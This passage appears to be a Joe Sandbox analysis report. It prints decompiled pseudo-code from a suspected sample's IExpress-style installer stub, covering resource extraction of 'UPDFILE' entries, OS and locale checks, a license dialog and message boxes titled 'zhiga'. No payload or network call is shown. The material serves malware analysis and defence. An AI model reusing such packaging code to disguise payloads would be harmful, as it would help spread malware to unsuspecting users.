                                                          				asm("cdq");
                                                          				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                          				_t67 = 0;
                                                          				if(_t72 >= 0) {
                                                          					_t63 = _v52;
                                                          					if(_t72 + _t56 > _t63) {
                                                          						_t72 = _t63 - _t56;
                                                          					}
                                                          				} else {
                                                          					_t72 = _t67;
                                                          				}
                                                          				asm("cdq");
                                                          				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                          				if(_t59 >= 0) {
                                                          					_t63 = _v60;
                                                          					if(_t59 + _t53 > _t63) {
                                                          						_t59 = _t63 - _t53;
                                                          					}
                                                          				} else {
                                                          					_t59 = _t67;
                                                          				}
                                                          				return E01096CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                          			}

                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 010943F1
                                                          • GetWindowRect.USER32(00000000,?), ref: 0109440B
                                                          • GetDC.USER32(?), ref: 01094423
                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0109442E
                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0109443A
                                                          • ReleaseDC.USER32(?,00000000), ref: 01094447
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010944A2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$CapsDeviceRect$Release
                                                          • String ID:
                                                          • API String ID: 2212493051-0
                                                          • Opcode ID: dc30fffb3ec68c1e6b1d8c12eb1600953910e4222285b24b919089ce825df7c6
                                                          • Instruction ID: 63a50890fbd669083e619dc79c36a1a7e2245b518553e0a8459fe5af29dc5075
                                                          • Opcode Fuzzy Hash: dc30fffb3ec68c1e6b1d8c12eb1600953910e4222285b24b919089ce825df7c6
                                                          • Instruction Fuzzy Hash: 3E311872E00119AFCF14CEB8DA989EEBBB5FB89310F154169F845F3244DA35AD058B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E01096298(intOrPtr __ecx, intOrPtr* __edx) {
                                                          				signed int _v8;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				struct HINSTANCE__* _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				struct HRSRC__* _t21;
                                                          				intOrPtr _t26;
                                                          				void* _t30;
                                                          				struct HINSTANCE__* _t36;
                                                          				intOrPtr* _t40;
                                                          				void* _t41;
                                                          				intOrPtr* _t44;
                                                          				intOrPtr* _t45;
                                                          				void* _t47;
                                                          				signed int _t50;
                                                          				struct HINSTANCE__* _t51;
                                                          
                                                          				_t44 = __edx;
                                                          				_t16 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t16 ^ _t50;
                                                          				_t46 = 0;
                                                          				_v32 = __ecx;
                                                          				_v36 = 0;
                                                          				_t36 = 1;
                                                          				E0109171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                          				while(1) {
                                                          					_t51 = _t51 + 0x10;
                                                          					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                          					if(_t21 == 0) {
                                                          						break;
                                                          					}
                                                          					_t45 = LockResource(LoadResource(_t46, _t21));
                                                          					if(_t45 == 0) {
                                                          						 *0x1099124 = 0x80070714;
                                                          						_t36 = _t46;
                                                          					} else {
                                                          						_t5 = _t45 + 8; // 0x8
                                                          						_t44 = _t5;
                                                          						_t40 = _t44;
                                                          						_t6 = _t40 + 1; // 0x9
                                                          						_t47 = _t6;
                                                          						do {
                                                          							_t26 =  *_t40;
                                                          							_t40 = _t40 + 1;
                                                          						} while (_t26 != 0);
                                                          						_t41 = _t40 - _t47;
                                                          						_t46 = _t51;
                                                          						_t7 = _t41 + 1; // 0xa
                                                          						 *0x109a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                          						_t30 = _v32();
                                                          						if(_t51 != _t51) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						_push(_t45);
                                                          						if(_t30 == 0) {
                                                          							_t36 = 0;
                                                          							FreeResource(??);
                                                          						} else {
                                                          							FreeResource();
                                                          							_v36 = _v36 + 1;
                                                          							E0109171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                          							_t46 = 0;
                                                          							continue;
                                                          						}
                                                          					}
                                                          					L12:
                                                          					return E01096CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                          				}
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0109171E: _vsnprintf.MSVCRT ref: 01091750
                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 010962CD
                                                          • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 010962D4
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 0109631B
                                                          • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 01096345
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010951CA,00000004,00000024,01092F71,?,00000002,00000000), ref: 01096357
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                          • String ID: UPDFILE%lu
                                                          • API String ID: 2922116661-2329316264
                                                          • Opcode ID: 3763e9582f051459d6dcf5fed6403a882af21359e9fb1e0a4fda247bb981684d
                                                          • Instruction ID: e574a54c415843d068e2f974c5bbe5e12bccdf18375cc5d19f50ba44a80826b6
                                                          • Opcode Fuzzy Hash: 3763e9582f051459d6dcf5fed6403a882af21359e9fb1e0a4fda247bb981684d
                                                          • Instruction Fuzzy Hash: 1121F875B0021AAFDF219F65DC659FEBB78FB44714B008159F982A3240D73B99019BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E0109681F(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v20;
                                                          				struct _OSVERSIONINFOA _v168;
                                                          				void* _v172;
                                                          				int* _v176;
                                                          				int _v180;
                                                          				int _v184;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				long _t31;
                                                          				signed int _t35;
                                                          				void* _t36;
                                                          				intOrPtr _t41;
                                                          				signed int _t44;
                                                          
                                                          				_t36 = __ebx;
                                                          				_t19 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t19 ^ _t44;
                                                          				_t41 =  *0x10981d8; // 0xfffffffe
                                                          				_t43 = 0;
                                                          				_v180 = 0xc;
                                                          				_v176 = 0;
                                                          				if(_t41 == 0xfffffffe) {
                                                          					 *0x10981d8 = 0;
                                                          					_v168.dwOSVersionInfoSize = 0x94;
                                                          					if(GetVersionExA( &_v168) == 0) {
                                                          						L12:
                                                          						_t41 =  *0x10981d8; // 0xfffffffe
                                                          					} else {
                                                          						_t41 = 1;
                                                          						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                          							goto L12;
                                                          						} else {
                                                          							_t31 = RegQueryValueExA(_v172, 0x1091140, 0,  &_v184,  &_v20,  &_v180);
                                                          							_t43 = _t31;
                                                          							RegCloseKey(_v172);
                                                          							if(_t31 != 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t40 =  &_v176;
                                                          								if(E010966F9( &_v20,  &_v176) == 0) {
                                                          									goto L12;
                                                          								} else {
                                                          									_t35 = _v176 & 0x000003ff;
                                                          									if(_t35 == 1 || _t35 == 0xd) {
                                                          										 *0x10981d8 = _t41;
                                                          									} else {
                                                          										goto L12;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                          			}

                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0109686E
                                                          • GetSystemMetrics.USER32(0000004A), ref: 010968A7
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010968CC
                                                          • RegQueryValueExA.ADVAPI32(?,01091140,00000000,?,?,0000000C), ref: 010968F4
                                                          • RegCloseKey.ADVAPI32(?), ref: 01096902
                                                            • Part of subcall function 010966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0109691A), ref: 01096741
                                                          Strings
                                                          • Control Panel\Desktop\ResourceLocale, xrefs: 010968C2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                          • API String ID: 3346862599-1109908249
                                                          • Opcode ID: 206c4f4cbc53db3354ebf9f5f5b5486bbc1d9218fd9198121288cf9855df9a49
                                                          • Instruction ID: e7bf8eaddebc5782af89251379bd2a63275c694f366dc7eeaa3fc65d60256558
                                                          • Opcode Fuzzy Hash: 206c4f4cbc53db3354ebf9f5f5b5486bbc1d9218fd9198121288cf9855df9a49
                                                          • Instruction Fuzzy Hash: 6D317F71A00228DFDF318B15CC64BEAB7BCFB46764F0041E6E989A6240D7369985DB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01093A3F(void* __eflags) {
                                                          				void* _t3;
                                                          				void* _t9;
                                                          				CHAR* _t16;
                                                          
                                                          				_t16 = "LICENSE";
                                                          				_t1 = E0109468F(_t16, 0, 0) + 1; // 0x1
                                                          				_t3 = LocalAlloc(0x40, _t1);
                                                          				 *0x1098d4c = _t3;
                                                          				if(_t3 != 0) {
                                                          					_t19 = _t16;
                                                          					if(E0109468F(_t16, _t3, _t28) != 0) {
                                                          						if(lstrcmpA( *0x1098d4c, "<None>") == 0) {
                                                          							LocalFree( *0x1098d4c);
                                                          							L9:
                                                          							 *0x1099124 = 0;
                                                          							return 1;
                                                          						}
                                                          						_t9 = E01096517(_t19, 0x7d1, 0, E01093100, 0, 0);
                                                          						LocalFree( *0x1098d4c);
                                                          						if(_t9 != 0) {
                                                          							goto L9;
                                                          						}
                                                          						 *0x1099124 = 0x800704c7;
                                                          						L2:
                                                          						return 0;
                                                          					}
                                                          					E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree( *0x1098d4c);
                                                          					 *0x1099124 = 0x80070714;
                                                          					goto L2;
                                                          				}
                                                          				E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x1099124 = E01096285();
                                                          				goto L2;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01092F64,?,00000002,00000000), ref: 01093A5D
                                                          • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 01093AB3
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          • lstrcmpA.KERNEL32(<None>,00000000), ref: 01093AD0
                                                          • LocalFree.KERNEL32 ref: 01093B13
                                                            • Part of subcall function 01096517: FindResourceA.KERNEL32(01090000,000007D6,00000005), ref: 0109652A
                                                            • Part of subcall function 01096517: LoadResource.KERNEL32(01090000,00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01096538
                                                            • Part of subcall function 01096517: DialogBoxIndirectParamA.USER32(01090000,00000000,00000547,010919E0,00000000), ref: 01096557
                                                            • Part of subcall function 01096517: FreeResource.KERNEL32(00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01096560
                                                          • LocalFree.KERNEL32(00000000,01093100,00000000,00000000), ref: 01093AF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                          • String ID: <None>$LICENSE
                                                          • API String ID: 2414642746-383193767
                                                          • Opcode ID: 628c7f7d23414fe5c5d71dcccaad7fb830272c0d2bcc13f120916ebef346417e
                                                          • Instruction ID: 1d8cedc2612d0a9c50342ff855616d7c2c45a72d799c8e040ba02d42b24d1a6a
                                                          • Opcode Fuzzy Hash: 628c7f7d23414fe5c5d71dcccaad7fb830272c0d2bcc13f120916ebef346417e
                                                          • Instruction Fuzzy Hash: FA119D70701201ABDF34AF769D38E5B3AF9FBD9750B00442EB5C5DA298DA7F8801AB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010924E0(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t7;
                                                          				void* _t20;
                                                          				long _t26;
                                                          				signed int _t27;
                                                          
                                                          				_t20 = __ebx;
                                                          				_t7 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t7 ^ _t27;
                                                          				_t25 = 0x104;
                                                          				_t26 = 0;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					E0109658A( &_v268, 0x104, "wininit.ini");
                                                          					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                          					_t25 = _lopen( &_v268, 0x40);
                                                          					if(_t25 != 0xffffffff) {
                                                          						_t26 = _llseek(_t25, 0, 2);
                                                          						_lclose(_t25);
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                          			}

                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 01092506
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0109252C
                                                          • _lopen.KERNEL32(?,00000040), ref: 0109253B
                                                          • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0109254C
                                                          • _lclose.KERNEL32(00000000), ref: 01092555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                          • String ID: wininit.ini
                                                          • API String ID: 3273605193-4206010578
                                                          • Opcode ID: d4d4a46f451d9b4a425caf3f7d4dc2b8123da354180139c1ffc7cf0f1590385b
                                                          • Instruction ID: 1ed6a957e572f70a0f5b962be2255a5f591d826cd30ee463a04f85297e074496
                                                          • Opcode Fuzzy Hash: d4d4a46f451d9b4a425caf3f7d4dc2b8123da354180139c1ffc7cf0f1590385b
                                                          • Instruction Fuzzy Hash: 96017931700118A7DB309A699C2CEDF7B7CEB95750F000195FA85D3144DA794E55CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E010936EE(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _OSVERSIONINFOA _v416;
                                                          				signed int _v420;
                                                          				signed int _v424;
                                                          				CHAR* _v428;
                                                          				CHAR* _v432;
                                                          				signed int _v436;
                                                          				CHAR* _v440;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t72;
                                                          				CHAR* _t77;
                                                          				CHAR* _t91;
                                                          				CHAR* _t94;
                                                          				int _t97;
                                                          				CHAR* _t98;
                                                          				signed char _t99;
                                                          				CHAR* _t104;
                                                          				signed short _t107;
                                                          				signed int _t109;
                                                          				short _t113;
                                                          				void* _t114;
                                                          				signed char _t115;
                                                          				short _t119;
                                                          				CHAR* _t123;
                                                          				CHAR* _t124;
                                                          				CHAR* _t129;
                                                          				signed int _t131;
                                                          				signed int _t132;
                                                          				CHAR* _t135;
                                                          				CHAR* _t138;
                                                          				signed int _t139;
                                                          
                                                          				_t72 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t72 ^ _t139;
                                                          				_v416.dwOSVersionInfoSize = 0x94;
                                                          				_t115 = __ecx;
                                                          				_t135 = 0;
                                                          				_v432 = __ecx;
                                                          				_t138 = 0;
                                                          				if(GetVersionExA( &_v416) != 0) {
                                                          					_t133 = _v416.dwMajorVersion;
                                                          					_t119 = 2;
                                                          					_t77 = _v416.dwPlatformId - 1;
                                                          					__eflags = _t77;
                                                          					if(_t77 == 0) {
                                                          						_t119 = 0;
                                                          						__eflags = 1;
                                                          						 *0x1098184 = 1;
                                                          						 *0x1098180 = 1;
                                                          						L13:
                                                          						 *0x1099a40 = _t119;
                                                          						L14:
                                                          						__eflags =  *0x1098a34 - _t138; // 0x0
                                                          						if(__eflags != 0) {
                                                          							goto L66;
                                                          						}
                                                          						__eflags = _t115;
                                                          						if(_t115 == 0) {
                                                          							goto L66;
                                                          						}
                                                          						_v428 = _t135;
                                                          						__eflags = _t119;
                                                          						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                          						_t11 =  &_v420;
                                                          						 *_t11 = _v420 & _t138;
                                                          						__eflags =  *_t11;
                                                          						_v440 = _t115;
                                                          						do {
                                                          							_v424 = _t135 * 0x18;
                                                          							_v436 = E01092A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                          							_t91 = E01092A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                          							_t123 = _v436;
                                                          							_t133 = 0x54d;
                                                          							__eflags = _t123;
                                                          							if(_t123 < 0) {
                                                          								L32:
                                                          								__eflags = _v420 - 1;
                                                          								if(_v420 == 1) {
                                                          									_t138 = 0x54c;
                                                          									L36:
                                                          									__eflags = _t138;
                                                          									if(_t138 != 0) {
                                                          										L40:
                                                          										__eflags = _t138 - _t133;
                                                          										if(_t138 == _t133) {
                                                          											L30:
                                                          											_v420 = _v420 & 0x00000000;
                                                          											_t115 = 0;
                                                          											_v436 = _v436 & 0x00000000;
                                                          											__eflags = _t138 - _t133;
                                                          											_t133 = _v432;
                                                          											if(__eflags != 0) {
                                                          												_t124 = _v440;
                                                          											} else {
                                                          												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                          												_v420 =  &_v268;
                                                          											}
                                                          											__eflags = _t124;
                                                          											if(_t124 == 0) {
                                                          												_t135 = _v436;
                                                          											} else {
                                                          												_t99 = _t124[0x30];
                                                          												_t135 = _t124[0x34] + 0x84 + _t133;
                                                          												__eflags = _t99 & 0x00000001;
                                                          												if((_t99 & 0x00000001) == 0) {
                                                          													asm("sbb ebx, ebx");
                                                          													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                          												} else {
                                                          													_t115 = 0x104;
                                                          												}
                                                          											}
                                                          											__eflags =  *0x1098a38 & 0x00000001;
                                                          											if(( *0x1098a38 & 0x00000001) != 0) {
                                                          												L64:
                                                          												_push(0);
                                                          												_push(0x30);
                                                          												_push(_v420);
                                                          												_push("zhiga");
                                                          												goto L65;
                                                          											} else {
                                                          												__eflags = _t135;
                                                          												if(_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												__eflags =  *_t135;
                                                          												if( *_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												MessageBeep(0);
                                                          												_t94 = E0109681F(_t115);
                                                          												__eflags = _t94;
                                                          												if(_t94 == 0) {
                                                          													L57:
                                                          													0x180030 = 0x30;
                                                          													L58:
                                                          													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                          													__eflags = _t115 & 0x00000004;
                                                          													if((_t115 & 0x00000004) == 0) {
                                                          														__eflags = _t115 & 0x00000001;
                                                          														if((_t115 & 0x00000001) == 0) {
                                                          															goto L66;
                                                          														}
                                                          														__eflags = _t97 - 1;
                                                          														L62:
                                                          														if(__eflags == 0) {
                                                          															_t138 = 0;
                                                          														}
                                                          														goto L66;
                                                          													}
                                                          													__eflags = _t97 - 6;
                                                          													goto L62;
                                                          												}
                                                          												_t98 = E010967C9(_t124, _t124);
                                                          												__eflags = _t98;
                                                          												if(_t98 == 0) {
                                                          													goto L57;
                                                          												}
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags = _t138 - 0x54c;
                                                          										if(_t138 == 0x54c) {
                                                          											goto L30;
                                                          										}
                                                          										__eflags = _t138;
                                                          										if(_t138 == 0) {
                                                          											goto L66;
                                                          										}
                                                          										_t135 = 0;
                                                          										__eflags = 0;
                                                          										goto L44;
                                                          									}
                                                          									L37:
                                                          									_t129 = _v432;
                                                          									__eflags = _t129[0x7c];
                                                          									if(_t129[0x7c] == 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t133 =  &_v268;
                                                          									_t104 = E010928E8(_t129,  &_v268, _t129,  &_v428);
                                                          									__eflags = _t104;
                                                          									if(_t104 != 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t135 = _v428;
                                                          									_t133 = 0x54d;
                                                          									_t138 = 0x54d;
                                                          									goto L40;
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							__eflags = _t91;
                                                          							if(_t91 > 0) {
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _t123;
                                                          							if(_t123 != 0) {
                                                          								__eflags = _t91;
                                                          								if(_t91 != 0) {
                                                          									goto L37;
                                                          								}
                                                          								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                          								L27:
                                                          								if(__eflags <= 0) {
                                                          									goto L37;
                                                          								}
                                                          								L28:
                                                          								__eflags = _t135;
                                                          								if(_t135 == 0) {
                                                          									goto L33;
                                                          								}
                                                          								_t138 = 0x54c;
                                                          								goto L30;
                                                          							}
                                                          							__eflags = _t91;
                                                          							_t107 = _v416.dwBuildNumber;
                                                          							if(_t91 != 0) {
                                                          								_t131 = _v424;
                                                          								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                          								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                          									goto L37;
                                                          								}
                                                          								goto L28;
                                                          							}
                                                          							_t132 = _t107 & 0x0000ffff;
                                                          							_t109 = _v424;
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                          							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                          								goto L28;
                                                          							}
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                          							goto L27;
                                                          							L33:
                                                          							_t135 =  &(_t135[1]);
                                                          							_v428 = _t135;
                                                          							_v420 = _t135;
                                                          							__eflags = _t135 - 2;
                                                          						} while (_t135 < 2);
                                                          						goto L36;
                                                          					}
                                                          					__eflags = _t77 == 1;
                                                          					if(_t77 == 1) {
                                                          						 *0x1099a40 = _t119;
                                                          						 *0x1098184 = 1;
                                                          						 *0x1098180 = 1;
                                                          						__eflags = _t133 - 3;
                                                          						if(_t133 > 3) {
                                                          							__eflags = _t133 - 5;
                                                          							if(_t133 < 5) {
                                                          								goto L14;
                                                          							}
                                                          							_t113 = 3;
                                                          							_t119 = _t113;
                                                          							goto L13;
                                                          						}
                                                          						_t119 = 1;
                                                          						_t114 = 3;
                                                          						 *0x1099a40 = 1;
                                                          						__eflags = _t133 - _t114;
                                                          						if(__eflags < 0) {
                                                          							L9:
                                                          							 *0x1098184 = _t135;
                                                          							 *0x1098180 = _t135;
                                                          							goto L14;
                                                          						}
                                                          						if(__eflags != 0) {
                                                          							goto L14;
                                                          						}
                                                          						__eflags = _v416.dwMinorVersion - 0x33;
                                                          						if(_v416.dwMinorVersion >= 0x33) {
                                                          							goto L14;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					_t138 = 0x4ca;
                                                          					goto L44;
                                                          				} else {
                                                          					_t138 = 0x4b4;
                                                          					L44:
                                                          					_push(_t135);
                                                          					_push(0x10);
                                                          					_push(_t135);
                                                          					_push(_t135);
                                                          					L65:
                                                          					_t133 = _t138;
                                                          					E010944B9(0, _t138);
                                                          					L66:
                                                          					return E01096CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                          				}
                                                          			}






































                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 01093723
                                                          • MessageBeep.USER32(00000000), ref: 010939C3
                                                          • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 010939F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Message$BeepVersion
